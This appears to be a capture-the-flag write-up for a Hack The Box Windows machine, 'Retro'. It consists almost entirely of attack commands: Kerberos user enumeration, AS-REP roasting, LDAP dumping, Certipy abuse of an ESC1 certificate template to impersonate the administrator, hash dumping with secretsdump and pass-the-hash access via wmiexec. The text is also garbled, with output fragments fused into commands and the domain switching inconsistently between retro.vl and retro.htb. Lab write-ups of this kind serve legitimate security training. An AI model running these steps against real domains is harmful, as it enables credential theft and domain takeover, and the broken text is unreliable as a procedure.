Difficulty: Medium
IP Address: 10.129.234.44
Date Completed: 2025-06-25
Retro was an ADCS-themed Windows box focused on certificate abuse for privilege escalation. While the core exploitation path was standard, the real challenge came from getting tooling (especially Certipy) to work correctly due to domain resolution and legacy configuration quirks.
nmap -p- -T4 -v 10.129.234.44 --min-rate 10000 -oA nmap/full
nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,3389 -sC -sV -oA nmap/scripts 10.129.234.44
# Using kerbrute to enumerate usernames
kerbrute userenum --dc 10.129.234.44 -d retro.htb users.txt
trainee# AS-REP roasting test
impacket-GetNPUsers retro.htb/ -dc-ip 10.129.234.44 -usersfile users.txt -format hashcat
trainee required pre-auth.# Enumerate LDAP as 'trainee'
python3 ldapdomaindump.py -u trainee -p trainee -d retro.htb -ip 10.129.234.44
banking$Initial attempts with Certipy v5.x failed due to RPC and DNS errors.
# Critical fix: /etc/hosts and krb5.conf must reflect internal domain `retro.vl`
echo "10.129.234.44 dc.retro.vl" | sudo tee -a /etc/hosts
# /etc/krb5.conf
[libdefaults]
default_realm = RETRO.VL
dns_lookup_realm = false
dns_lookup_kdc = false
[realms]
RETRO.VL = {
kdc = dc.retro.vl
admin_server = dc.retro.vl
}
# Certipy find
certipy find -u trainee@retro.vl -p trainee -vulnerable -stdout
RetroClients template vulnerable to ESC1.banking$ had enroll rights.certipy req -u 'banking$@dc.retro.htb' -p 'Password123' \
-ca 'retro-DC-CA' -target 'retro.htb' -template 'RetroClients' \
-upn 'administrator@retro.htb' -dns 'retro.htb' -key-size 4096
administrator_retro.pfx# Get TGT from certificate
certipy auth -pfx administrator_retro.pfx -domain retro.htb
# Dump hashes
secretsdump.py -k -no-pass retro.htb/administrator@10.129.234.44
administrator.impacket-wmiexec administrator@10.129.234.44 -hashes :<NTLM_HASH>
/etc/hosts and krb5.conf tweaks.✅ Box complete